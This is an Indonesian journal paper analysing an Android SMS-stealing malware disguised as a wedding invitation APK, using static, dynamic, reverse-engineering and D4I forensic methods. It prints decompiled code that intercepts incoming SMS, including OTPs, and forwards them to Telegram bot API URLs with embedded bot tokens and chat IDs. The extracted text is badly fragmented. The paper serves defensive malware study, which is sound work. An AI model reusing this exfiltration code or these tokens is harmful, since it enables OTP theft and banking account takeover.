Jurnal Ilmu Komputer dan Desain Komunikasi Visual Volume 10.
Nomor 2.
Desember 2025 ISSN (Ceta.
: 2541-4550 ISSN (Onlin.
: 2541-4585 Analisis Aplikasi Malware pada Android Menggunakan Reverse Engineering dan Framework D4I Khotibul Umam 1.
Achmad Kafa Abdillah2 .
Andik Izzudin 3.
Subhan Nooriansyah4* 12,3,4 Program Studi Sistem Informasi.
Fakultas Sains dan Teknologi.
UIN Sunan Ampel Surabaya Jl.
Yani No.
Surabaya.
Jawa Timur.
Indonesia bul@gmail.
com, 2achmadkafa7@gmail.
com, 3andik@uinsby.
nooriansyah@uinsa.
Abstrak Aplikasi Undangan.
apk pada platform Android telah menjadi subjek analisis mendalam untuk mengevaluasi potensi ancaman keamanan yang dibawanya.
Melalui serangkaian metode analisis termasuk Qu1cksc0pe, analisis dinamis, analisis reverse engineering, dan analisis menggunakan Framework D4I, kami dapat mengungkapkan bahwa aplikasi ini menyimpan potensi serius dalam mencuri data pengguna dan mengakses informasi yang sensitif.
Qu1cksc0pe memberikan wawasan tentang karakteristik aplikasi dan izin yang diberikan, sementara analisis dinamis menyoroti komunikasi aplikasi dengan server eksternal melalui API bot Telegram.
Analisis reverse engineering menegaskan tujuan aplikasi untuk mencuri SMS OTP dan mengirimkannya ke server tertentu.
Framework D4I mengidentifikasi urutan peristiwa dan hubungan antara artefak dalam serangan, memberikan pemahaman yang lebih dalam tentang cara kerja dan perkembangan serangan tersebut.
Dengan demikian, aplikasi Undangan.
memunculkan ancaman signifikan yang memerlukan tindakan respons keamanan yang tepat untuk melindungi pengguna dari risiko keamanan yang terkait.
Kata kunciAiKeamanan aplikasi Android, analisis malware, analisis dinamis, reverse engineering.
Framework D4I Abstract The Undangan.
apk application on the Android platform has been subjected to in-depth analysis to evaluate the potential security threats it poses.
Through a series of analysis methods, including Qu1cksc0pe, dynamic analysis, reverse engineering, and analysis using the D4I Framework, we were able to uncover that this application harbors serious potential in stealing user data and accessing sensitive information.
Qu1cksc0pe provided insights into the application's characteristics and permissions granted, while dynamic analysis highlighted the application's communication with an external server via the Telegram bot API.
Reverse engineering analysis confirmed the application's intention to steal SMS OTPs and transmit them to a specific server.
The D4I Framework identified the sequence of events and relationships between artifacts in the attack, providing deeper insight into the workings and progression of the Thus, the Undangan.
apk application poses a significant threat that necessitates appropriate security response actions to protect users from associated security risks.
KeywordsAi Android application security, malware analysis, dynamic analysis, reverse engineering.
D4I Framework Ciptaan disebarluaskan di bawah Lisensi Creative Commons Attribution 4.
0 International License.
Jurnal Ilmu Komputer dan Desain Komunikasi Visual Volume 10.
Nomor 2.
Desember 2025 ISSN (Ceta.
: 2541-4550 ISSN (Onlin.
: 2541-4585
PENDAHULUAN
Perkembangan teknologi informasi telah menghadirkan beragam inovasi, salah satunya adalah teknologi mobile.
Teknologi mobile meliputi smartphone, tablet, dan wearable device yang memungkinkan pengguna untuk mengakses aplikasi dan data dari mana saja dan kapan saja (Zulkifli M.
M dkk.
, 2.
Dengan kemampuan ini, aktivitas sehari-hari seperti berkomunikasi, bekerja, berbelanja, dan mengakses informasi telah menjadi lebih mudah dan fleksibel.
Namun, seiring dengan kemajuan ini, juga muncul tantangan baru, terutama dalam hal keamanan.
Sistem operasi Android telah menjadi salah satu sistem operasi paling populer untuk perangkat smartphone di seluruh dunia (Rusli dkk.
, 2.
Dalam tahun 2023, pangsa pasar android mencapai 70%, menegaskan posisinya sebagai salah satu sistem operasi paling dominan dalam industri (Federica Laricchia, 2.
Popularitas yang tinggi ini menjadikan platform android menjadi sasaran yang menarik bagi pengembang aplikasi, namun juga membawa tantangan besar dalam hal keamanan (Mitra dkk.
, 2.
Oleh karena itu, meningkatkan keamanan aplikasi android menjadi sangat penting dalam perkembangan platform ini.
Gambar 1.
Mobile Operating System Market Share Worldwide Dengan peningkatan pesat dalam penggunaan dan perkembangan sistem operasi android, terutama karena sifatnya yang open source, telah terjadi lonjakan dalam pembuatan dan distribusi aplikasi melalui playstore.
Meskipun membawa manfaat besar dalam hal inovasi dan kebebasan pengembangan, keterbukaan ini juga membuka pintu bagi penyisipan perangkat lunak berbahaya oleh sebagian pengembang aplikasi (Meng , 2.
Malware menjadi ancaman serius dalam ekosistem android, menyebabkan kerugian besar seperti pencurian data pribadi pengguna dan kebocoran data yang merugikan instansi (Indana Zulfa dkk.
, 2.
Celah keamanan dalam aplikasi android dapat memiliki konsekuensi serius bagi pengguna dan instansi.
Pencurian informasi pribadi seperti email, nomor telepon, dan data sensitif lainnya merupakan dampak yang signifikan dari celah keamanan (Nurindahsari & Zen, 2.
Lebih lanjut, kebocoran data yang disebabkan oleh celah keamanan dapat merugikan instansi dengan kerugian finansial dan reputasi yang besar (Pangestu & Ciptaan disebarluaskan di bawah Lisensi Creative Commons Attribution 4.
0 International License.
Jurnal Ilmu Komputer dan Desain Komunikasi Visual Volume 10.
Nomor 2.
Desember 2025 ISSN (Ceta.
: 2541-4550 ISSN (Onlin.
: 2541-4585 Syahputra, 2.
Oleh karena itu, penting bagi pengguna untuk memperhatikan keamanan data dan memverifikasi keaslian aplikasi sebelum menginstalnya.
Badan Siber dan Sandi Negara (BSSN) mencatat bahwa salah satu ancaman keamanan aplikasi yang umum adalah malware yang menyebar melalui teknik phishing (BSSN, 2.
Phishing merupakan bentuk serangan siber di mana penyerang menipu korban untuk mengungkapkan informasi pribadi dan sensitif (Razzaq dkk.
, 2.
Penyerang sering kali menyamar sebagai entitas yang terpercaya, seperti teman atau staf instansi resmi, untuk mendapatkan akses tidak sah ke perangkat korban (Chandrasena.
Pengguna yang tidak waspada dapat terinfeksi dengan malware setelah mengunduh dan menginstal aplikasi palsu, yang dapat menyebabkan pencurian data pribadi yang sensitif.
Sebagai contoh, salah satu metode penyebaran malware yang sering digunakan adalah melalui undangan pernikahan dalam format file Android Package APK) Ketika korban memasang aplikasi tersebut, data pribadi mereka dapat dicuri oleh pelaku (Eka Sila & Mochamad Taufik, 2.
Ini menekankan pentingnya pemahaman tentang serangan malware dan dampaknya terhadap pengguna perangkat android.
Mengingat meningkatnya ancaman keamanan, diperlukan pendekatan yang efektif untuk mengidentifikasi, mengisolasi, dan menghapus ancaman pada perangkat Salah satu cara untuk melakukan ini adalah dengan melakukan analisis mendalam terhadap aplikasi yang mencakup berbagai metode, seperti analisis statis, dinamis, reverse engineering, dan penggunaan framework forensik (Anwar dkk.
, 2.
Metode analisis statis melibatkan pemeriksaan kode sumber, file, dan manifestasi aplikasi tanpa mengeksekusinya.
Sementara itu, analisis dinamis melibatkan pengamatan perilaku aplikasi saat dijalankan, sering kali melalui debugging pada perangkat.
Reverse engineering memungkinkan pengguna untuk mendekompilasi kode sumber aplikasi dan memahami logika dan perilaku yang terkait.
Terakhir, penggunaan framework forensik, seperti Framework D4I, memberikan pendekatan yang terstruktur dan sistematis untuk analisis keamanan aplikasi android, membantu dalam mendeteksi dan merespons ancaman keamanan dengan lebih efektif.
Dengan menggabungkan berbagai metode ini, pengguna dapat melakukan analisis yang komprehensif dan mendalam untuk meningkatkan keamanan perangkat android mereka.
Penelitian sebelumnya telah mengungkapkan berbagai aspek terkait keamanan aplikasi android dan deteksi malware.
Dalam sebuah studi oleh Ariyianingsih, dkk .
, ditemukan bahwa terdapat hubungan yang signifikan antara kejahatan siber dan perkembangan digitalisasi di Indonesia.
Studi ini menyoroti risiko yang meningkat terhadap serangan cybercrime seiring dengan pertumbuhan sektor e-commerce dan transaksi online, yang juga dipengaruhi oleh rendahnya kesadaran tentang keamanan siber di kalangan pengguna teknologi digital.
Ashawa dan Morris .
melakukan sebuah analisis tentang teknik deteksi malware untuk perangkat android.
Penelitian ini menemukan bahwa sebagian besar teknik deteksi saat ini kurang efektif dalam mendeteksi malware zero-day dan rentan terhadap varian malware yang menggunakan obfuscation.
Namun, penelitian ini tidak memberikan rekomendasi atau solusi konkret untuk mengatasi masalah tersebut.
Ciptaan disebarluaskan di bawah Lisensi Creative Commons Attribution 4.
0 International License.
Jurnal Ilmu Komputer dan Desain Komunikasi Visual Volume 10.
Nomor 2.
Desember 2025 ISSN (Ceta.
: 2541-4550 ISSN (Onlin.
: 2541-4585 Studi oleh Hutchinson dan Karabiyik .
mengevaluasi efektivitas alat deteksi malware Multi-Level Anomaly Detection for Android Malware (MADAM) dan layanan Google Play Protect dalam mendeteksi aplikasi berbahaya.
Hasilnya menunjukkan bahwa MADAM mampu mendeteksi beberapa kelas malware, termasuk spyware, dengan tingkat deteksi yang tinggi.
Namun, penelitian ini tidak menyediakan analisis mendalam tentang bagaimana serangan spyware dapat dicegah atau ditangani oleh pengguna atau platform android.
Anggraini, dkk .
mengusulkan penggunaan algoritma Nayve Bayes dengan diskritisasi variabel untuk mendeteksi malware.
Studi ini menunjukkan bahwa diskritisasi variabel dengan interval 5 menghasilkan kinerja deteksi terbaik.
Namun, penelitian ini belum melakukan perbandingan dengan metode deteksi lain atau evaluasi performa secara mendalam.
Dimitriadis, dkk .
mengembangkan kerangka forensik digital yang disebut D4I, yang bertujuan untuk meningkatkan fase pemeriksaan dan analisis investigasi serangan siber.
Namun, penelitian ini memerlukan evaluasi lebih lanjut untuk mengidentifikasi potensial kerugian atau keterbatasan dari kerangka kerja yang Tinjauan literatur ini menyoroti pentingnya penelitian lanjutan dalam pengembangan teknik deteksi malware yang lebih efektif, strategi pencegahan serangan malware, dan evaluasi lebih lanjut terhadap kerangka kerja forensik digital untuk mendukung analisis investigasi serangan siber.
METODE PENELITIAN
Dalam penelitian ini.
Framework D4I diimplementasikan dengan pendekatan yang terdiri dari beberapa tahap untuk analisis forensik malware android.
Tahap utama dalam penelitian ini melibatkan analisis statis dan dinamis menggunakan alat Qu1cksc0pe, analisis source code menggunakan apktool, dan yang terakhir analisis menggunakan framework D4I.
Gambar 2.
Alur Penelitian Analisis dimulai dengan analisis statis dari sampel malware menggunakan alat Qu1cksc0pe.
Fokus utama pada tahap ini adalah pemeriksaan kode sumber, file, dan manifestasi aplikasi tanpa mengeksekusinya.
Selanjutnya, analisis dinamis dilakukan dengan mengaktifkan izin debug pada ponsel pintar.
Laptop terhubung ke ponsel pintar menggunakan kabel tipe-C USB untuk mentransfer data dan memfasilitasi analisis Aplikasi malware diunduh dan diinstal pada ponsel pintar, dan kemudian perilaku aplikasi dimonitor untuk analisis dinamis.
Setelah analisis statis dan dinamis dilakukan, dilanjutkan dengan metode reverse engineering untuk memperoleh pemahaman yang lebih dalam tentang cara kerja Dengan menggunakan alat reverse engineering yaitu Apktool, source code Ciptaan disebarluaskan di bawah Lisensi Creative Commons Attribution 4.
0 International License.
Jurnal Ilmu Komputer dan Desain Komunikasi Visual Volume 10.
Nomor 2.
Desember 2025 ISSN (Ceta.
: 2541-4550 ISSN (Onlin.
: 2541-4585 aplikasi malware dapat dideskompilasi dan dianalisis untuk memahami logika aplikasi dan strategi yang digunakan dalam serangan.
Melanjutkan proses analisis dengan Framework D4I melibatkan beberapa tahap yang menjadi dasar untuk memahami dan mengidentifikasi serangan cyber pada malware android mobile.
Tahap pertama adalah pemilihan fase (Chos.
dalam Cyber Kill Chain (CKC) yang akan menjadi fokus analisis.
Pada tahap ini, urutan pemilihan didasarkan pada tahap CKC oleh Lockheed Martin (Lockheed Martin, 2.
Setelah memilih fase, tahap selanjutnya melibatkan identifikasi artefak (Identif.
, di mana pencarian dan pengenalan semua artefak atau bukti digital yang terkait dengan fase CKC yang dipilih dilakukan.
Langkah ini penting untuk memahami jejak digital yang dapat memberikan petunjuk tentang serangan cyber yang terjadi.
Tahap ketiga adalah korelasi artefak (Correlat.
, sebuah fase di mana hubungan atau korelasi antara artefak dalam fase CKC yang dipilih dicari dengan artefak dalam fase yang sama, fase sebelumnya, atau fase berikutnya.
Tujuannya adalah untuk membangun pemahaman mendalam tentang serangan cyber yang sedang dianalisis.
Selanjutnya, tahap keempat adalah membangun Chain of Correlate Artifacts (Construct CoA).
Tahap ini dilakukan dengan mengintegrasikan artefak yang memiliki korelasi dari fase CKC yang sama, fase sebelumnya, atau fase berikutnya ke dalam CoA.
Ini membantu membentuk gambaran yang lebih lengkap tentang serangan yang terjadi.
Proses kelima melibatkan pengulangan (Repea.
tahap-tahap sebelumnya untuk setiap fase dalam CKC.
Hal ini dilakukan untuk memastikan bahwa seluruh urutan peristiwa tercakup, dan analisis dapat diterapkan secara komprehensif.
Terakhir, tahap keenam adalah analisis CoA (Analyze CoA).
Pada tahap ini, analisis mendalam dari CoA yang dibangun dilakukan.
Tujuannya adalah untuk menentukan apakah CoA mencerminkan serangan siber.
Analisis ini dapat memberikan wawasan yang lebih dalam tentang modus operandi malware dan strategi yang digunakan dalam serangan, memungkinkan formulasi langkah-langkah pencegahan dan mitigasi yang lebih Gambar 3.
Tahapan Framework D4I
HASIL DAN PEMBAHASAN
Analisis Qu1cksc0pe Hasil analisis menggunakan Qu1cksc0pe mengungkapkan beberapa aspek penting terkait dengan sampel malware yang dianalisis.
Proses analisis statis dengan Ciptaan disebarluaskan di bawah Lisensi Creative Commons Attribution 4.
0 International License.
Jurnal Ilmu Komputer dan Desain Komunikasi Visual Volume 10.
Nomor 2.
Desember 2025 ISSN (Ceta.
: 2541-4550 ISSN (Onlin.
: 2541-4585 menggunakan Qu1cksc0pe memungkinkan identifikasi awal terhadap karakteristik dan sifat aplikasi tanpa mengeksekusinya.
Berikut adalah temuan utama dari analisis ini:
[*] Analyzing: Undangan.
[*] Target OS: Android [*] General Informations about Undangan.
>>>> App Name: Undangan >>>> Package Name: com.
[*] Sending query to Google Play Store about target application.
>>>> Google Play Store: Not Found >>>> SDK Version: 32 >>>> Main Activity: None >>>> Signatures:
>> META-INF/CERT.
RSA
Gambar 4.
Informasi dasar tentang aplikasi Undangan.
Pada tahap awal analisis, aplikasi dengan nama "Undangan" dikemas dengan paket "com.
androidsmsotpteski" dan tidak ditemukan di Google PlayStore resmi.
Aplikasi ini dikompilasi dengan SDK version 32, yang memberikan wawasan tentang kemungkinan fitur dan kemampuan yang didukung oleh aplikasi.
Tanda tangan aplikasi yang teridentifikasi dalam file META-INF/CERT.
RSA dapat digunakan untuk memverifikasi integritas dan otentikasi aplikasi.
Tabel 1.
Perizinan saat aplikasi diinstall Permission DYNAMIC_RECEIVER_NOT_EXPORTED_PERMISSIONo RECEIVE_SMS INTERNET Analisis juga mengungkap beberapa izin yang diberikan oleh aplikasi, seperti izin untuk menerima pesan SMS, akses internet, dan izin dinamis yang memerlukan peninjauan lebih lanjut untuk memahami tujuan dan dampak penggunaannya.
Tabel 2.
Aktifitas dan penerima mencurigakan dalam aplikasi Activities Receivers SmsEyeMainAct abyssalarmy.
SmsEyeSmsLis DexterActivity ProfileInstallRecei Komponen-komponen aplikasi seperti aktivitas dan penerima juga teridentifikasi selama analisis.
Aktivitas utama "abyssalarmy.
SmsEyeMainActivity" merupakan fokus utama aplikasi.
Ciptaan disebarluaskan di bawah Lisensi Creative Commons Attribution 4.
0 International License.
Jurnal Ilmu Komputer dan Desain Komunikasi Visual Volume 10.
Nomor 2.
Desember 2025 ISSN (Ceta.
: 2541-4550 ISSN (Onlin.
: 2541-4585 Penerima "abyssalarmy.
SmsEyeSmsListener" terkait dengan pemantauan pesan SMS.
Tabel 3.
Kategori dan komponen dalam aplikasi Category Number of Found Patterns Number of Files SMS Bot Base64 Camera Microphone Interaction Information Gathering/Stealing Database File Operations Persistence/Managing Network/Internet SSL Pining/Certificate Handling Dynamic Class/Dex Loading Java Reflection Cryptography Anti-VM/Anti-Debug Selain itu, hasil analisis mencakup statistik tentang kategori dan komponen aplikasi, seperti pola terkait dengan bot pesan singkat, interaksi dengan mikrofon, operasi file, dan penggunaan kriptografi.
Pola-pola ini memberikan wawasan tentang fungsionalitas aplikasi dan potensi risiko keamanan yang terkait.
Tabel 4.
URL yang diekstrak dari aplikasi Extracted URL Values https://goo.
gle/compose-feedback http://schemas.
com/apk/res/android https://api.
org/bot https://api.
org/file/bot https://api.
org/bot7036075360:AAEc6uH1ri53RXHEQbr2wqSuApP3xJW5 e4o/sendMessage?parse_mode=markdown&chat_id=6428777719&text=* https://api.
org/bot7036075360:AAEc6uH1ri53RXHEQbr2wqSuApP3xJW5 e4o/sendMessage?parse_mode=markdown&chat_id=6428777719&text=yasyayayayayayayaoyaya yaAyayauyayayaoyaya yaEya yaOyayayayaoyauyau \n yaeyayaya yaayayayaoyayayayaoya: _" https://api.
org/bot7036075360:AAEc6uH1ri53RXHEQbr2wqSuApP3xJW5 e4o/sendMessage?parse_mode=markdown&chat_id=6428777719&text=Error : _" https://api.
org/bot7036075360:AAEc6uH1ri53RXHEQbr2wqSuApP3xJW5 e4o/sendMessage?parse_mode=markdown&chat_id=6428777719&text=yasyayayayayayayaoyaya yaAyayauyayayaoyaya yaEya yaOyayayayaoyauyau \n yaeyayaya yaayayayaoyayayayaoya: _" this.
device "_" http://schemas.
com/apk/res-auto Ciptaan disebarluaskan di bawah Lisensi Creative Commons Attribution 4.
0 International License.
Jurnal Ilmu Komputer dan Desain Komunikasi Visual Volume 10.
Nomor 2.
Desember 2025 ISSN (Ceta.
: 2541-4550 ISSN (Onlin.
: 2541-4585 Extracted URL Values https://undanganpernikahan11.
http://schemas.
com/aapt https://publicsuffix.
org/list/public_suffix_list.
https://mozilla.
org/MPL/2.
Extracted URL Values https://goo.
gle/compose-feedback https://api.
org/bot http://schemas.
com/apk/res/android Hasil analisis juga mencakup informasi tentang nilai URL yang diekstrak dari aplikasi, opsi keamanan dasar, aktivitas ekspor, serta deteksi potensial terhadap Trojan SMS Spy oleh berbagai mesin antivirus.
[INTENT
CALL]
PACKAGE_ADDED
dat=package:com.
flg=0x4000010 cmp=com.
PersistentIntentOperationService .
as extra.
[PROVIDER CALL] Settings.
Secure Settings.
Global.
[INTENT
CALL]
PACKAGE_ADDED
dat=package:com.
flg=0x4000010 cmp=com.
GmsIntentOperationService .
as extra.
[INTENT CALL] android.
DROPBOX_ENTRY_ADDED flg=0x10 .
as GmsIntentOperationService$PersistentTrustedRec [INTENT CALL] VIEW dat=file:///storage/emulated/0/Undangan.
apk typ=application/vnd.
flg=0x10000000 cmp=com.
packageinstaller/com.
InstallStart as extra.
from uid 10072 and from pid 29076
[PROVIDER
CALL]
MediaScannerService.
run(MediaScannerService.
[INTENT CALL] VIEW dat=file:///data/user_de/0/com.
packageinstaller/no_backup/package35 flg=0x10000 cmp=com.
packageinstaller/com.
PackageInst allerActivity .
as extra.
from uid 10020 and from pid 29407 [INTENT CALL] android.
BATTERY_CHANGED flg=0x60000010 .
as extra.
[INTENT CALL] PACKAGE_REMOVED dat=package:com.
androidsmsotpteski flg=0x4000010 .
as extra.
to vending/com.
Instant AppRemoveMonitor Ciptaan disebarluaskan di bawah Lisensi Creative Commons Attribution 4.
0 International License.
Jurnal Ilmu Komputer dan Desain Komunikasi Visual Volume 10.
Nomor 2.
Desember 2025 ISSN (Ceta.
: 2541-4550 ISSN (Onlin.
: 2541-4585
[INTENT
CALL]
PACKAGE_REPLACED
dat=package:com.
androidsmsotpteski flg=0x4000010 .
as extra.
to service/com.
PackageReceiver [INTENT CALL] MAIN flg=0x10000000 pkg=com.
cmp=com.
androidsmsotpteski/abyssalarmy.
SmsEyeMainActivity from uid 10020 and from pid 29407 [PROVIDER CALL] android.
[METHOD CALL] ActivityManager: START u0 .
ct=android.
MAIN
flg=0x10000000 pkg=com.
cmp=com.
androidsmsotpteski/abyssalarmy.
SmsEyeMainActivit.
from uid 10020 and from pid 29407 [INTENT CALL] android.
DROPBOX_ENTRY_ADDED flg=0x10 .
as GmsIntentOperationService$PersistentTrustedRec [INTENT CALL] android.
BATTERY_CHANGED flg=0x60000010 .
as extra.
Gambar 5.
Hasil analisis dinamis Dalam analisis dinamis, beberapa aktivitas signifikan tercatat, termasuk panggilan intent penambahan paket, akses ke pengaturan keamanan perangkat, aktivitas media, dan panggilan intent terkait baterai dan perubahan pada layar perangkat, yang menunjukkan pemantauan status baterai dan interaksi dengan kejadian terkait layar.
Analisis Reverse Engineering Setelah melakukan dekompilasi terhadap APK, didapati bahwa aplikasi memerlukan izin untuk menerima SMS, menggunakan internet, membaca, dan mengirim pesan.
Dengan kombinasi izin-izin tersebut, terlihat bahwa aplikasi ini mungkin ditujukan untuk pencurian One Time Password (OTP) dari ponsel korban.
Tabel 5.
Perizinan Aplikasi
Dalam MainActivity.
onRequestPermissionsResult(), yang menarik untuk diamati.
Dalam fungsi ini, tampaknya terdapat komunikasi yang dilakukan ke aplikasi Telegram.
Hal ini menimbulkan kecurigaan bahwa aplikasi ini mungkin memiliki tujuan untuk mengirim data yang telah dicuri ke server atau pihak ketiga tertentu, mungkin melalui layanan Telegram.
Ciptaan disebarluaskan di bawah Lisensi Creative Commons Attribution 4.
0 International License.
Jurnal Ilmu Komputer dan Desain Komunikasi Visual Volume 10.
Nomor 2.
Desember 2025 ISSN (Ceta.
: 2541-4550 ISSN (Onlin.
: 2541-4585 public void onRequestPermissionsResult.
nt i.
String[] strArr, int[] iAr.
{ onRequestPermissionsResult.
, strArr, iAr.
!= 1.
{ if .
Arr.
== .
{ Toast.
makeText.
his, "Permintaan Anda Sedang di Proses", .
show().
Request Request.
Builder().
url("https://api.
org/bot5931495238:AAHOz7qP80CGo8D 8yueYGJv3Rib4xuKSxHQ/sendMessage?parse_mode=markdown&chat_id=5641182 991&text=" this.
build().
Requestbuild2=newRequest.
Builder().
url("https://api.
org/bot593149523 8:AAHOz7qP80CGo8D8yueYGJv3Rib4xuKSxHQ/sendMessage?parse_mode=mark down&chat_id=5641182991&text= " this.
build().
newCall.
ew Callback() { public void onFailure(Call call.
IOException iOExceptio.
{ iOException.
printStackTrace().
public void onResponse(Call call.
Response respons.
throws IOException Log.
d("demo1", "OnResponse:
Thread Thread.
currentThread().
getId()).
isSuccessful()) { body().
string().
}}}).
newCall.
ew Callback() { public void onFailure(Call call.
IOException iOExceptio.
{ iOException.
printStackTrace().
public void onResponse(Call call.
Response respons.
throws IOException Log.
d("demo1", "OnResponse:
Thread Thread.
currentThread().
getId()).
isSuccessful()) { body().
string().
}}}).
Toast.
makeText.
his, "Gagal,Silahkan Coba Install lagi", .
show().
Request Request.
Builder().
url(HttpUrl.
FRAGMENT_ENCODE_SET this.
build().
Request Request.
Builder().
url(HttpUrl.
FRAGMENT_ENCODE_SET this.
build().
newCall.
ew Callback() { public void onFailure(Call call.
IOException iOExceptio.
{ iOException.
printStackTrace().
public void onResponse(Call call.
Response respons.
throws IOException { Log.
d("demo1", "OnResponse:
Thread Thread.
currentThread().
getId()).
isSuccessful()) { body().
string().
}).
newCall.
ew Callback() { public void onFailure(Call call.
IOException iOExceptio.
{ Ciptaan disebarluaskan di bawah Lisensi Creative Commons Attribution 4.
0 International License.
Jurnal Ilmu Komputer dan Desain Komunikasi Visual Volume 10.
Nomor 2.
Desember 2025 ISSN (Ceta.
: 2541-4550 ISSN (Onlin.
: 2541-4585 iOException.
printStackTrace().
public void onResponse(Call call.
Response respons.
throws IOException { Log.
d("demo1", "OnResponse:
Thread Thread.
currentThread().
getId()).
isSuccessful()) { body().
string().
}}}).
finish().
Gambar 6.
file MainActivity.
Pada gambar 10 terlihat aplikasi tersebut melakukan pengiriman request ke api telegram dengan request body berikut.
https://api.
org/bot5931495238:AAHOz7qP80CGo8D8yueYGJv3Rib4xuKS xHQ/sendMessage?parse_mode=markdown&chat_id=5641182991&text=Ay" Gambar 7.
Url API bot telegram Nilai this.
device adalah gabungan dari beberapa informasi perangkat, termasuk sidik jari perangkat (Build.
FINGERPRINT), waktu pembangunan perangkat (Build.
TIME),
dan set encode fragment dari URL (HttpUrl.
FRAGMENT_ENCODE_SET).
Nilai ini akan berbeda-beda untuk setiap perangkat.
Kelihatannya ini dilakukan untuk memberi tanda pada perangkat yang telah berhasil mendapatkan izin yang diperlukan oleh aplikasi.
Fungsi onRequestPermissionsResult() akan dipanggil saat aplikasi berhasil mendapatkan izin dari pemilik perangkat.
Hal ini menunjukkan bahwa aplikasi akan menunggu hingga izin-izin yang diperlukan untuk mencuri OTP berhasil diperoleh sebelum melanjutkan ke langkah berikutnya.
public void onReceive(Context context.
Intent inten.
{ Bundle extras.
String str = " ".
getAction().
equals("android.
Telephony.
SMS_RECEIVED")
xtras = intent.
getExtras()) != nul.
{ Object[] objArr = (Object[]) extras.
get("pdus").
SmsMessage[] smsMessageArr = new SmsMessage.
bjArr.
int i = 0.
< smsMessageArr.
{ smsMessageArr.
SmsMessage.
createFromPdu(.
yte[]) objArr.
Ciptaan disebarluaskan di bawah Lisensi Creative Commons Attribution 4.
0 International License.
Jurnal Ilmu Komputer dan Desain Komunikasi Visual Volume 10.
Nomor 2.
Desember 2025 ISSN (Ceta.
: 2541-4550 ISSN (Onlin.
: 2541-4585 String originatingAddress smsMessageArr.
getOriginatingAddress().
String replace = smsMessageArr.
getMessageBody().
replace("&", " ").
replace("#", st.
String replace2 = replace.
replace("?", st.
Request build = new Request.
Builder().
url("https://api.
org/bot5931495238:AAHOz7qP80CGo8D 8yueYGJv3Rib4xuKSxHQ/sendMessage?parse_mode=markdown&chat_id=5641182 991&text=" originatingAddress ",: " replac.
build().
String str2 = str.
Request Request.
Builder().
url("https://api.
org/bot5931495238:AAHOz7qP80CGo8D 8yueYGJv3Rib4xuKSxHQ/sendMessage?parse_mode=markdown&chat_id=5641182 991&text=" originatingAddress ", : " replac.
build().
newCall.
ew Callback() { public void onFailure(Call call.
IOException iOExceptio.
{ iOException.
printStackTrace().
public void onResponse(Call call.
Response respons.
throws IOException { Log.
d("demo", "OnResponse:
Thread Thread.
currentThread().
getId()).
isSuccessful()) { body().
string().
}).
newCall.
ew Callback() { public void onFailure(Call call.
IOException iOExceptio.
{ iOException.
printStackTrace().
public void onResponse(Call call.
Response respons.
throws IOException { Log.
d("demo", "OnResponse:
Thread Thread.
currentThread().
getId()).
isSuccessful()) { body().
string().
}).
str = str2.
} catch (Exception .
{ printStackTrace().
Ciptaan disebarluaskan di bawah Lisensi Creative Commons Attribution 4.
0 International License.
Jurnal Ilmu Komputer dan Desain Komunikasi Visual Volume 10.
Nomor 2.
Desember 2025 ISSN (Ceta.
: 2541-4550 ISSN (Onlin.
: 2541-4585 Gambar 8.
File ReceiveSms.
Pada function onReceive aplikasi akan mengambil alamat pengirim pesan dan isi pesan yang selanjutnya akan di teruskan melalui telegram API dengan request url berikut.
https://api.
org/bot5931495238:AAHOz7qP80CGo8D8yueYGJv3Rib4xuKS xHQ/sendMessage?parse_mode=markdown&chat_id=5641182991&text= Gambar 9.
Url API untuk meneruskan pesan Setelah melakukan penelusuran terhadap api telegram yang ada, ditemukan beberapa informasi seperti berikut.
{"ok":true,"result":{"message_id":11065,"from":{"id":7036075360,"is_bot":true,"firs t_name":"Garuda","username":"Cintakuyuyu_bot"},"chat":{"id":6428777719,"first_n ame":"Admin FEC Shop","username":"ADM_FEC_SHOP","type":"private"},"date":1714913159,"text":
"\ud835\udc0d\ud835\udc28\ud835\udc2d\ud835\udc22\ud835\udc1f\ud835\udc22\u d835\udc24\ud835\udc1a\ud835\udc2c\ud835\udc22"}} Gambar 10.
Isi API yang dikirim melalui bot telegram Terdapat akun bot dengan username @Cintakuyuyu_bot dan akun asli dengan username @ADM_FEC_SHOP Gambar 11.
Akun telegram pelaku dan akun bot telegram yang digunakan Ciptaan disebarluaskan di bawah Lisensi Creative Commons Attribution 4.
0 International License.
Jurnal Ilmu Komputer dan Desain Komunikasi Visual Volume 10.
Nomor 2.
Desember 2025 ISSN (Ceta.
: 2541-4550 ISSN (Onlin.
: 2541-4585 Analisis Framework D4I Proses analisis forensik menggunakan Framework D4I dimulai dengan pemilihan fase CKC, yang diawali dengan fase Installation.
Setelah fase Installation dianalisis, langkah selanjutnya adalah menganalisis fase Exploitation, yang kemudian diikuti oleh fase Delivery.
Proses ini berlanjut secara berurutan melalui fase Weaponization.
Command and Control.
Reconnaissance, dan Action on Object.
Tabel 6.
Identifikasi artefak Artefak Fase Reconnaissance Weaponization Delivery File .
Pesan WhatsApp.
Installation Package added.
Akses ke direktori WebView.
Exploitation Akses perizinan.
Command and Control API bot Telegram.
Action on Object Unauthorized Access Setelah pemilihan fase CKC, langkah selanjutnya adalah identifikasi artefak yang terkait dengan masing-masing fase serangan.
Artefak yang diidentifikasi mencakup apk pada fase Weaponization, pesan WhatsApp pada fase Deliivery, dan aktivitas instalasi serta akses perizinan pada fase Exploitation.
Fase Command and Control melibatkan penggunaan API bot Telegram, sedangkan pada tahap Action on Object, terjadi peretasan akun m-banking dan e-wallet sebagai tindakan lanjutan dari seluruh fase yang telah dijalankan.
Fase Reconnaissance Weaponization Delivery Installation Exploitation Tabel 7.
Korelasi artefak Korelasi Weaponization melibatkan pembuatan file .
apk dengan kode berbahaya didalamnya yang kemudian disebarkan melalui pesan WhatsApp Pengiriman melalui phising pada pesan WhatsApp melibatkan malware dalam package aplikasi undangan.
Apk yang sudah disiapkan.
Fase instalasi melibatkan file yang diinstall, aktifitas pada Webview.
Eksploitasi melibatkan perizinan akses pesan, setelah fase Ciptaan disebarluaskan di bawah Lisensi Creative Commons Attribution 4.
0 International License.
Jurnal Ilmu Komputer dan Desain Komunikasi Visual Volume 10.
Nomor 2.
Desember 2025 ISSN (Ceta.
: 2541-4550 ISSN (Onlin.
: 2541-4585 Fase Command and Control Action on Object Korelasi Penggunaan API bot Telegram untuk Command and Control berkaitan dengan fase-fase sebelumnya.
Peretasan akun m-banking dan e-wallet terjadi sebagai tindakan lanjutan dari seluruh fase yang sudah dijalankan.
Korelasi antar artefak juga telah diidentifikasi, menunjukkan hubungan antara berbagai fase CKC dalam serangan siber.
Misalnya, fase Weaponization melibatkan pembuatan berkas .
apk dengan kode berbahaya yang disebarkan melalui pesan WhatsApp pada fase Delivery.
